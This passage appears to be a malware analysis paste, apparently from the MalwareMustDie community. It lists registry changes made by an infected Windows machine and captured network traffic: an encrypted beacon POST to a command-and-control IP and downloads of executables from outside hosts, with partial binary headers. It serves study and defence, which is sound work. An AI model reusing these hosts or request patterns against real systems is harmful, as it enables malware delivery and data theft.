  1483. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
  1484. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
  1485. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
  1486. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
  1487. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
  1488. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
  1489. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
  1490. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
  1491. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
  1492. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
  1493. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
  1494. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
  1495. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
  1496. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
  1497. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
  1498. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
  1499. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
  1500. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
  1501. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
  1502. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
  1503. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
  1504. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
  1505. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
  1506. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
  1507. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
  1508. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
  1509. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
  1510. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
  1511. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
  1512. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
  1513. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
  1514. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
  1515. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
  1516. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
  1517. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
  1518. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb
  1519. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79:
  1520. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg
  1521.  
  1522. ----------------------------------
  1523. Values modified:23
  1524. ----------------------------------
  1525. HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
  1526. HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
  1527. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
  1528. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
  1529. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
  1530. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
  1531. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
  1532. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
  1533. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
  1534. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
  1535. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
  1536. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
  1537. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
  1538. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
  1539. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
  1540. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
  1541. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
  1542. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
  1543. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
  1544. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
  1545. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
  1546. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
  1547. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
  1548. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
  1549. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
  1550. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
  1551. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
  1552. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
  1553. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
  1554. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
  1555. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
  1556. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
  1557. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
  1558. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
  1559. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
  1560. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
  1561. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
  1562. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
  1563. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
  1564. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
  1565. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
  1566. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
  1567. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
  1568. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
  1569. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
  1570. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006
  1571.  
  1572.  
  1573. ==============================================
  1574. EVIL NETWORK CONNECTIVITIES..............
  1575. ==============================================
  1576.  
  1577.  
  1578. (1)POST /forum/viewtopic.php HTTP/1.0
  1579. Host: 108.178.59.34
  1580. Accept: */*
  1581. Accept-Encoding: identity, *;q=0
  1582. Content-Length: 255
  1583. Connection: close
  1584. Content-Type: application/octet-stream
  1585. Content-Encoding: binary
  1586. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1587. CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
  1588. ..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
  1589. ..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
  1590. ...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
  1591. =C.f..<.\......B.*
  
HTTP/1.1 200 OK
  1593. Server: nginx/0.7.67
  1594. Date: Wed, 17 Oct 2012 04:17:15 GMT
  1595. Content-Type: text/html
  1596. Connection: close
  1597. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  1598.  
  1599. -----------
  1600. (2)GET /Z2U.exe HTTP/1.0
  1601. Host: 3073.a.hostable.me
  1602. Accept: */*
  1603. Accept-Encoding: identity, *;q=0
  1604. Connection: close
  1605. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1606.  
  1607. HTTP/1.1 200 OK
  1608. Date: Wed, 17 Oct 2012 04:13:17 GMT
  1609. Server: Apache
  1610. Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
  1611. Accept-Ranges: bytes
  1612. Content-Length: 407128
  1613. Connection: close
  1614. Content-Type: application/x-msdownload
  1615. MZ......................@..........................................
  1616. .....!..L.!This program cannot be run in DOS mode.
  1617. $.......PE..L...
  1618.  
  1619.  
  1620. ----------------------------------------
  1621.  
  1622. (3)GET /PNV3Hbi.exe HTTP/1.0
  1623. Host: 85.18.21.252
  1624. Accept: */*
  1625. Accept-Encoding: identity, *;q=0
  1626. Connection: close
  1627. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1628.  
  1629.  
  1630. HTTP/1.1 200 OK
  1631. Date: Wed, 17 Oct 2012 04:09:24 GMT
  1632. Server: Apache/2.2.22 (Debian)
  1633. Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
  1634. ETag: "242fca-63658-4cc3963d6a094"
  1635. Accept-Ranges: bytes
  1636. Content-Length: 407128
  1637. Connection: close
  1638. Content-Type: application/x-msdos-program
  1639. MZ......................@...............................................!
  1640. This program cannot be run in DOS mode.$.......PE..L....(~P..............
  1641. .Z....................@.......................... ......................
  1642. ......................................................................U..
  1643. ..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
  1644. .E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".
  1645.  
  1646.  
  1647. #MalwareMustDie!!!!!!!!!